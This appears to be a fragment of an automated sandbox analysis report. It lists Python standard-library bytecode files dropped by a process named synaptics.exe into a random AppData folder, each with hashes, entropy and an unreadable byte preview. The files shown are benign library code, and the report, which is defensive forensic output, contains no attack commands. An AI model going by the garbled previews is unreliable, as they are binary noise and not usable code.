                                                                                                                                                                                                            Preview:o.......Z.,di........................@...s....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.Z.d.Z.e...d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z8Basic message object for the email package object model...Message..EmailMessage.....N)...BytesIO..StringIO)...utils)...errors)...Policy..compat32....charset)...decode_bz.; z.[ \(\)<>@,;:\\"/\[\]\?=]c....................C...s4...t.|.....d...\.}.}.}.|.s.|.....d.f.S.|.....|.....f.S.).N..;)...str..partition..strip)...param..a..sep..b..r.....<C:\Users\user\AppData\Local\xFSOj9El1Q\lib\email\message.py.._splitparam....s............r....Tc....................C...s....|.d.u.r^t.|...d.k.r^t.|.t...r&|.d.7.}.t...|.d...|.d...|.d.....}.d.|.|.f...S.z.|...d.....W.n...t.yG......|.d.7.}.t...|.d.d...}.d.|.|.f.....Y.S.w.|.sOt...|...rXd.|.t...|...f...S.d.|.|.f...S.|.S.).a~...Convenience function to format and return a key=value pair...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5697
                                                                                                                                                                                                            Entropy (8bit):4.927415797276728
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Y/3XAtP7ue6RPlVEnTSi7sebc9++etT2FZXUVt3NzMb:kgtP7+RPETSi7sebc9M2LXUVt3NzMb
                                                                                                                                                                                                            MD5:57E3B28374B37314F7E8171A86FA3B63
                                                                                                                                                                                                            SHA1:37586B081902BBBE35B28A4F35762431C66461DA
                                                                                                                                                                                                            SHA-256:158369B12BFF03D087A4EF35C06B3D53E9755B93E380AC83752B9639F5B5B39C
                                                                                                                                                                                                            SHA-512:1B7CDEBB66D0232BE03ED286246030D8065568FA330FF68E2A38D3ACB0E9AC970545D7FB398DD6A90A51D33120FC8991578A697960585B190D2763436C7BAAE2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d4........................@...sx...d.Z.g.d...Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).z-A parser of RFC 2822 and MIME email messages.)...Parser..HeaderParser..BytesParser..BytesHeaderParser..FeedParser..BytesFeedParser.....)...StringIO..TextIOWrapper).r....r....)...compat32c....................@...s0...e.Z.d.Z.d.e.d...d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).r....N....policyc....................C...s....|.|._.|.|._.d.S.).a....Parser of RFC 2822 and MIME email messages... Creates an in-memory object tree representing the email message, which. can then be manipulated and turned over to a Generator to return the. textual representation of the message... The string must be formatted as a block of RFC 2822 headers and header. continuation lines, optionally preceded by a `Unix-from' header. The. header block is terminated either by the end of the string or by a. blank
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7647
                                                                                                                                                                                                            Entropy (8bit):5.507720722688495
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:jLJLyjCY2rlgeRk/SEp4iIf3HOxK4RVZtp9s7tOcQekFUyq2n1/nGYu9ewBAd7zD:/JYUGQ2SE+27RlpXyyFhnGYQewBk8j4B
                                                                                                                                                                                                            MD5:0F4BD7EEE4546B4A15B5FEE37459029B
                                                                                                                                                                                                            SHA1:BACEE2DEDDA66F49ED2B8FB8F562702669C913A2
                                                                                                                                                                                                            SHA-256:BD4FDC33DD8EF60637FF5CD4B5D1F23A96FD09F2F30112C3A273F18A9A667AFA
                                                                                                                                                                                                            SHA-512:FB67FEDB2F830DD9868C22942592884B363392DF075BADFD318F82333C6DE2FE41C6DAC29EBC1A9D53E5F113A365F3BB293973A915109CFD079EF1C7F7880979
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.'.......................@...sF...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.Z.d.Z.d.Z.d.d...e.d...D...Z.e.d.d.....Z.e.d.d.....Z.d.e...d.....e...d.....D.].Z.e.e...e.e.<.q;d.e.e.d...<.d.D.].Z.e.e...e.e.<.qLd.d...Z.d.d...Z.d.d...Z.d.d...Z.d+d.d...Z.d.d...Z.d.d...Z.d,d.d ..Z.e.d.d.....Z.d!D.].Z.e.e...e.e.<.q.d"e.f.d#d$..Z.e.f.d%d&..Z.e.Z.e.Z.d'd(..Z.d)d*..Z d.S.)-aF...Quoted-printable content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode US ASCII-like 8-bit data called `quoted-printable'. It is used to.safely encode text that is in a character set similar to the 7-bit US ASCII.character set, but that includes some 8-bit characters that are normally not.allowed in email bodies or headers...Quoted-printable is very space-inefficient for encoding binary files; use the.email.base64mime module for that instead...This module provides an interface to encode and decode both headers and bodies.with quoted-p
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9710
                                                                                                                                                                                                            Entropy (8bit):5.5284961343995045
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:dbd4iopYU1b0vS5Tc8PNMw1TBrUEPUcXDu4cleZkcLPcCSStw3TG/3Wib/9:4pyv+FSwNBrUmbXDu4zRPiGyGF/9
                                                                                                                                                                                                            MD5:108A4A587489E95D5A1214CBBAC6F3C8
                                                                                                                                                                                                            SHA1:263E40CBC17ACEFB7FE4D42D822B082F3619B2A5
                                                                                                                                                                                                            SHA-256:5FCEF4755A57D53B29EF1EE6CC9F4A4D3334751CC3F822AA467504B63F541075
                                                                                                                                                                                                            SHA-512:9360ADFADB5741E2F7CF83F78C4604172212E4FD551BF851BB47EE2B124D1D02BF5AF0435AE963DCE8ABFBB87A5AD7540EEB273941DD731B08A56D0C0DE680AC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.5.......................@...sT...d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.e...d...Z.e...d...Z.d.d...Z.d.d...Z.d5d.d...Z.d.d...Z.d.d...Z d6d.d...Z!d7d.d...Z"d8d.d ..Z#d!d"..Z$d#d$..Z%d%d&..Z&d'd(..Z'd8d)d*..Z(e...d+e.j)..Z*d,d-..Z+.../d9d0d1..Z,d:d3d4..Z-d.S.);z.Miscellaneous utilities.)...collapse_rfc2231_value..decode_params..decode_rfc2231..encode_rfc2231..formataddr..formatdate..format_datetime..getaddresses..make_msgid..mktime_tz..parseaddr..parsedate..parsedate_tz..parsedate_to_datetime..unquote.....N)...quote)...AddressList).r....).r....r......_parsedate_tz)...Charsetz., ..z.....'z.[][\\()<>@,:;".]z.[\\"]c....................C...s$...z.|.......W.d.S...t.y.......Y.d.S.w.).z8Return True if s contains surrogate-escaped binary data.FT)...encode..UnicodeEncodeError)...s..r.....:C:\Users\user\AppData\Local\xFSOj9El1Q\lib\email\utils.py.._has_surrogates3...s..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3899
                                                                                                                                                                                                            Entropy (8bit):5.53641032832009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:7XLHIYGspF3e06Q0YhQkUjHz/6k1XYLKM/n5K7wlNUNYfq3JZ1Y:7XEYLpFkY1U7XYLf5c6+X1Y
                                                                                                                                                                                                            MD5:008472E59C94DC712F33C2457B285574
                                                                                                                                                                                                            SHA1:BB7F26768C9F54021E4CC42F391C7C99D1C52E63
                                                                                                                                                                                                            SHA-256:D8458765E442DBEF4D5385D12E85D4D237FACEAC3075BEA123D40AA3FD44CB2C
                                                                                                                                                                                                            SHA-512:2D5AE2923CC63120E4B7FDC80268D88C54D314C3BF3F9689F1F5435D8CA8B67E4E8A7FF8C37EB081045FC04D81CB422527DAB58CA65B574E78FBD0EC5463B951
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...i.Z.d.Z.d.g.Z.e.j.Z.G.d.d...d.e.e...Z.d.d...Z.d.d...Z.e...e.....e.j.d.k.r@d.d...Z.e...e.....d.S.d.S.).a2... Standard "encodings" Package.. Standard Python encoding modules are stored in this package. directory... Codec modules must have names corresponding to normalized encoding. names as defined in the normalize_encoding() function below, e.g.. 'utf-8' must be implemented by the module 'utf_8.py'... Each codec module must export the following interface:.. * getregentry() -> codecs.CodecInfo object. The getregentry() API must return a CodecInfo object with encoder, decoder,. incrementalencoder, incrementaldecoder, streamwriter and streamreader. attributes which adhere to the Python Codec Interface Standard... In addition, a module may optionally also define the following. APIs which are then used by the package's codec search function:.. * getaliases() -> sequence of enc
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10945
                                                                                                                                                                                                            Entropy (8bit):5.844903978837486
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:NX2eNkBweGfGkueK4+I2Zyu6UtXqxUZH1iIzxOkq4bpehh3qkyR0N:NXG0bueBI6Czx9IX6Ri
                                                                                                                                                                                                            MD5:63D27EC2DCDA47261ADE1CED33A41BB7
                                                                                                                                                                                                            SHA1:F0CCD4ECFB8350ED0769B8B0F4413303B5E18CA8
                                                                                                                                                                                                            SHA-256:5588AA5CED64475F23AC06B5398E82D130AB839FCA3E9B69FAD0219570B1919E
                                                                                                                                                                                                            SHA-512:82F92C1299D9BEC0FE8A7784B12A694EDAB6B8DC5654D9BB18A01CD48CDA0ECA837838B36129A38FF7E51EC4A8012C6D4A348917F441DC7E5D44B2B6B47CDC75
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dd?.......................@...s....d.Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d#..d$d#..d%d#..d&d'..d(d'..d)d'..d*d'....i.d+d,..d-d,..d.d/..d0d/..d1d2..d3d2..d4d5..d6d5..d7d8..d9d8..d:d;..d<d;..d=d>..d?d>..d@dA..dBdA..dCdD....i.dEdD..dFdG..dHdG..dIdJ..dKdJ..dLdJ..dMdN..dOdN..dPdN..dQdN..dRdS..dTdS..dUdS..dVdW..dXdW..dYdW..dZdW....i.d[dW..d\d]..d^d]..d_d]..d`da..dbda..dcda..ddde..dfde..dgde..dhdi..djdi..dkdi..dldm..dndm..dodm..dpdq....i.drdq..dsdq..dtdu..dvdu..dwdu..dxdy..dzdy..d{dy..d|dy..d}d~..d.d~..d.d~..d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2401
                                                                                                                                                                                                            Entropy (8bit):5.445287562643166
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:l8HYqr1E0KGxtCOJxDvTk3J9rBDfLTTLTDfLTTp6HbDHT:2HY0EDWtZjr+Jldf33Pf396nz
                                                                                                                                                                                                            MD5:977BBD4C321FEDE12B57C06E7B4D0D14
                                                                                                                                                                                                            SHA1:8AF0A30825AB2B49A8DFE3BD2EE26B55758DEF18
                                                                                                                                                                                                            SHA-256:B7681E2C39D409DFDBD6808FBA42A443E534F8DFC72B8F3FA51BC61916C1D55F
                                                                                                                                                                                                            SHA-512:ECDA7C2B4AE9AAE4D501BEFBB1F407CE22F0048F8C24EEC4C1FF154D62ED1C01960214505585878DD951CADD263641956B48FBA46A342CF63FDD9380DB6A4AC5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.5.......................@...s....d.Z.d.d.l.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.e.j...Z.G.d.d...d.e.e.j...Z.d.d...Z.d.Z.e...e...Z.d.S.).zv Python Character Mapping Codec cp1252 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1252.TXT' with gencodec.py........Nc....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.)...Codec..strictc....................C........t...|.|.t...S...N)...codecs..charmap_encode..encoding_table....self..input..errors..r.....?C:\Users\user\AppData\Local\xFSOj9El1Q\lib\encodings\cp1252.py..encode...........z.Codec.encodec....................C...r....r....).r......charmap_decode..decoding_tabler....r....r....r......decode....r....z.Codec.decodeN).r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........r....c....................@........e.Z.d.Z.d.d.d...Z.d.S.)...IncrementalEncoderFc....................C........t...|.|.j.t...d...S...Nr....).r....r....r....r......r....r......fin
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5623
                                                                                                                                                                                                            Entropy (8bit):5.2347580780769345
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:VD5boZ0Mq9d9y50Om16wQNWLT1arA5fCAFK5n4NcJwp7ogXdB:5VoZ0n9d92Dm1rQNWL8s5aZocJwpJNB
                                                                                                                                                                                                            MD5:C7BBB7A60C3FBE75472EDAAEBA5E8FB8
                                                                                                                                                                                                            SHA1:09137598401073BDBC71DB93C6CED531E67A8630
                                                                                                                                                                                                            SHA-256:1FBE9E39D408817DC817C2D0F2D3754D9B4F3E9907964B7A067C326127A5DB43
                                                                                                                                                                                                            SHA-512:27FB7E05B33149785157E939611B084D4B656101D208A255BC763EEE66CE4822FD5C01F465F1AFC119F78546D2911CEF21098FCA36A985C191F6D49078D58E88
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.$.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e...d...Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.e.j...Z.G.d.d...d.e.e.j...Z.d.d...Z.d.S.)......N)...ucd_3_2_0u....[....]s....xn--z.xn--c....................C...s....g.}.|.D.].}.t...|...r.q.|...t...|.......q.d...|...}.t...d.|...}.|.D.]5}.t...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...rWt.d.|.......q"d.d...|.D...}.t.|...r|t.d.d...|.D.....rpt.d.....|.d...rx|.d...s|t.d.....|.S.).N....NFKCz.Invalid character %rc....................S...s....g.|.].}.t...|.....q.S...)...stringprepZ.in_table_d1.....0..xr....r.....=C:\Users\user\AppData\Local\xFSOj9El1Q\lib\encodings\idna.py..<listcomp>)...s......z.nameprep.<locals>.<listcomp>c....................s...s......|.].}.t...|...V...q.d.S.).N).r....Z.in_table_d2r....r....r....r......<genexpr>1...s........z.nameprep.<locals>.<genexpr>z.Violation of BIDI requirement 2r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1621
                                                                                                                                                                                                            Entropy (8bit):4.736923584683451
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:ld2Vtus1piplKHUrYPyaGcLXaLOsJkLBBn1U:ebuWPHUPNcLXaasmP1U
                                                                                                                                                                                                            MD5:C25AA59E91C10911AB436E0676BB7580
                                                                                                                                                                                                            SHA1:497259343263A217AD13E71F72C405A68D587128
                                                                                                                                                                                                            SHA-256:24F3C35481BE2C4511BEC37169799686439EB58167B2D855F2BAC218E563D944
                                                                                                                                                                                                            SHA-512:B6DE5945346A8A7ECA3B9B968DD500107572B88689498BFDDE8C93B43A9FD82C222378E5677F72B2895CF7764E60FA76BAA84DDB51920231A0A11D866678BC7B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sp...d.Z.d.d.l.Z.e.j.Z.d.d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.d...Z.d.S.).z. Python 'utf-8' Codec...Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........N..strictc....................C...s....t...|.|.d...S.).NT)...codecs..utf_8_decode)...input..errors..r.....>C:\Users\user\AppData\Local\xFSOj9El1Q\lib\encodings\utf_8.py..decode....s......r....c....................@...s....e.Z.d.Z.d.d.d...Z.d.S.)...IncrementalEncoderFc....................C...s....t...|.|.j...d...S.).Nr....).r......utf_8_encoder....)...selfr......finalr....r....r......encode....s......z.IncrementalEncoder.encodeN).F)...__name__..__module__..__qualname__r....r....r....r....r....r........s........r....c....................@........e.Z.d.Z.e.j.Z.d.S.)...IncrementalDecoderN).r....r....r....r....r......_buffer_decoder....r....r....r....r.................r....c....................@...r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6440
                                                                                                                                                                                                            Entropy (8bit):5.804377268076172
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mWZsdAX4kaBaNzpZOZBDcxHN/8O2OHb4k7:m+zpZOZBDcpNp2iT
                                                                                                                                                                                                            MD5:E7276B8D9C5A4399EE2CD11AD2731B05
                                                                                                                                                                                                            SHA1:295D06CCA566D7B730B1085B444DBAF35408185F
                                                                                                                                                                                                            SHA-256:5A8540BF4351C20CCF81130159992FC5169617299BE0CE16B5566520163B307D
                                                                                                                                                                                                            SHA-512:F97CFA5A3D7379B9ABFD283E9C142E651AC872ADBFAEED05C242883AD741B083CBB0ED32694CA6561DCF16D31DCFE4E2DF43943CE5EF367416A74434D6B62DE2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s&...d.d.l.m.Z...d.g.Z.G.d.d...d.e...Z.d.S.)......)...IntEnum..HTTPStatusc....................@...s....e.Z.d.Z.d.Z.dDd.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z d!Z!d"Z"d#Z#d$Z$d%Z%d&Z&d'Z'd(Z(d)Z)d*Z*d+Z+d,Z,d-Z-d.Z.d/Z/d0Z0d1Z1d2Z2d3Z3d4Z4d5Z5d6Z6d7Z7d8Z8d9Z9d:Z:d;Z;d<Z<d=Z=d>Z>d?Z?d@Z@dAZAdBZBdCS.)Er....aG...HTTP status codes and reason phrases.. Status codes from the following RFCs are all observed:.. * RFC 7231: Hypertext Transfer Protocol (HTTP/1.1), obsoletes 2616. * RFC 6585: Additional HTTP Status Codes. * RFC 3229: Delta encoding in HTTP. * RFC 4918: HTTP Extensions for WebDAV, obsoletes 2518. * RFC 5842: Binding Extensions to WebDAV. * RFC 7238: Permanent Redirect. * RFC 2295: Transparent Content Negotiation in HTTP. * RFC 2774: An HTTP Extension Framework. * RFC 7725: An HTTP Status Code to Rep
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):35202
                                                                                                                                                                                                            Entropy (8bit):5.38016026621937
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:IoG3ovqgYyeQcyEqVHpu/TTaC5TCW9ObjcDds:jG3hgYyeQcyEqVHpETH5Tj9UjYC
                                                                                                                                                                                                            MD5:5E6AA999C7CE8DF9CC5EE918715C9F83
                                                                                                                                                                                                            SHA1:28D30E489B674CF4FDB18DDC856A5732124F9C09
                                                                                                                                                                                                            SHA-256:01D32519F4D2BCA22760807DE6E6AF1D070D3B056910D5AC2F6FE034D4B9D83E
                                                                                                                                                                                                            SHA-512:360CF2AAA732BC88D05C15E730E07C4418FF22D49AAB65FF6D02326AB7F346BE41841559D6313FEF2E0F8B8E685DB1D6EA27156EB6F12B453637516AB1D36DA4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sP...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.....e.j.j.....d.d...e.j.j.....D...Z.d.Z.d.Z.e...d...j.Z.e...d...j Z!e...d...Z"e...d...Z#h.d...Z$d?d.d...Z%G.d.d...d.e.j&j'..Z(d.d...Z)e(f.d.d...Z*G.d.d...d.e.j+..Z,G.d.d ..d ..Z-z.d.d.l.Z.W.n...e/y.......Y.n.w.G.d!d"..d"e-..Z0e..1d"....G.d#d$..d$e2..Z3G.d%d&..d&e3..Z4G.d'd(..d(e3..Z5G.d)d*..d*e3..Z6G.d+d,..d,e3..Z7G.d-d...d.e3..Z8G.d/d0..d0e3..Z9G.d1d2..d2e3..Z:G.d3d4..d4e:..Z;G.d5d6..d6e:..Z<G.d7d8..d8e:..Z=G.d9d:..d:e3..Z>G.d;d<..d<e3..Z?G.d=d>..d>e@e>..ZAe3ZBd.S.)@a....HTTP/1.1 client library..<intro stuff goes here>.<other stuff, too>..HTTPConnection goes through a number of "states", which define when a client.may legally make another request or fetch the response for a particular.request. This diagram details these state transitions:.. (null). |. | HTTPConnection(). v. Idle. |. | putr
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):53464
                                                                                                                                                                                                            Entropy (8bit):5.564456187273416
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:lB95TRGXx0wM1oyXc63+Rb+TXzpTrY/hgRkOfmXULJn0MFgddqRGfUehMJutkvPK:jAI1FXZ+R+ZyhXd6x8MMT
                                                                                                                                                                                                            MD5:D55E816665F2BBA359EB226BF2B0FA3F
                                                                                                                                                                                                            SHA1:CC638A95FD703B12186FB0A182AB60C641F1E1DA
                                                                                                                                                                                                            SHA-256:AC00F27E6CC4938DFA36E92E84733F8993C548B29A1D4422935D4A31CBF0D5D9
                                                                                                                                                                                                            SHA-512:D9DA51A4950D4B23C8CFD79F11010A5C50D1D68A5AF40E6CD9DB7114674B4B90199572D61EC4F11F4F9276C14AE96A85D81D2DF7CEEC2BC73BEDA9AC0B56EA2D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.6.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.Z.d.a.d.d...Z.d.Z.d.Z.e.e.j.j...Z.e...d...Z.d.Z.d.Z.d.d...Z.d.Z.d.d...Z.g.d...Z g.d...Z!g.Z"e!D.].Z#e".$e#.%......qadid.d...Z&did.d...Z'd.d.d.d.d...Z(e...d.e.j)..Z*d.d...Z+d.d...Z,e...d.e.j)..Z-e...d.e.j.e.j)B...Z/e...d e.j0e.j)B...Z1d!d"..Z2e...d#e.j0e.j)B...Z3d$d%..Z4d&d'..Z5e...d(..Z6e...d)..Z7e...d*..Z8e...d+..Z9d,d-..Z:e...d...Z;d/d0..Z<d1d2..Z=d3d4..Z>e...d5e.j)..Z?d6d7..Z@d8d9..ZAd:d;..ZBd<d=..ZCe...d>e.j)..ZDd?d@..ZEdAdB..ZFdCdD..ZGdEdF..ZHdGZIe...dH..ZJdIdJ..ZKdKdL..ZLdMdN..ZMdOdP..ZNG.dQdR..dR..ZOG.dSdT..dT..ZPG.dUdV..dVeP..ZQdWdX..ZRdYdZ..ZSG.d[d\..d\..ZTG.d]d^..d^..ZUG.d_d`..d`eV..ZWG.dadb..dbeU..ZXdcdd..ZYG.dedf..dfeX..ZZG.dgdh..dheX..Z[d.S.)ja....HTTP cookie handling for web clients...This module has (now fairly distant) origins in Gisle Aas' Perl module.HTTP::Cookies, from the libwww-perl library...Docstrings, comments and debug
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15362
                                                                                                                                                                                                            Entropy (8bit):5.448226356353315
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:gO6ZJt/SHD+IfhNGV10wqP+6JdMYFGBCeA4Gm0Ir7bDQs61vwOQY2jxP+Qh3lL44:HWJtS+Ifh8D0wqP+6JdMYsBrA4GmzfbX
                                                                                                                                                                                                            MD5:1D8BFE474CAB9A2693F5A113790FE43E
                                                                                                                                                                                                            SHA1:A600CDB128A68299264CB8A864320672EFD65B2B
                                                                                                                                                                                                            SHA-256:8451D5272B1A68D8B24A488BC7C73D2490FC2C2C36CF771F34A2C0190E3BEFE3
                                                                                                                                                                                                            SHA-512:468D67DD9F562863A04F52C322051315356245C8354D451A3D625854401948B68A3E68C3FBB631183F7FAD4A1D4ADEEA2ED1B1BA8F54635DEB6E32D803B3A334
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dfR.......................@...sZ...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.j.Z.d.j.Z.d.j.Z.G.d.d...d.e...Z.e.j.e.j...d...Z.e.d...Z.d.d...e.e.d.....e.e.e.e.......D...Z.e...e.d...d.e.d...d.i.....e...d.e...e.......j.Z.d.d...Z.e...d...Z.e...d...Z.d.d...Z.g.d...Z.g.d...Z.d.e.e.f.d.d...Z.G.d.d...d.e ..Z!d.Z"e"d ..Z#e...d!e"..d"..e#..d#..e.j$e.j%B...Z&G.d$d%..d%e ..Z'G.d&d'..d'e'..Z(d.S.)(a.....Here's a sample session to show how to use this module..At the moment, this is the only documentation...The Basics.----------..Importing is easy..... >>> from http import cookies..Most of the time you start by creating a cookie... >>> C = cookies.SimpleCookie()..Once you've created your Cookie, you can add values just as if it were.a dictionary... >>> C = cookies.SimpleCookie(). >>> C["fig"] = "newton". >>> C["sugar"] = "wafer". >>> C.output(). 'Set-Cookie: fig=newton\r\nSet-Cookie: sugar=wafer'..Notice that the printable representation of a Cookie is the.appropriate format for a
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3829
                                                                                                                                                                                                            Entropy (8bit):5.549510403691082
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:XuKEn4Gs1xwkB8/pIXEz66QncxK1p9W0j+VZzmF2Q8yIcOr:bEkCoMK1a0j+DmF2QZIh
                                                                                                                                                                                                            MD5:BD492FAFB8B64E9E71E0B95552AECD7C
                                                                                                                                                                                                            SHA1:971778B7F331DE44C418FF09694CEBFD1F8D1AD0
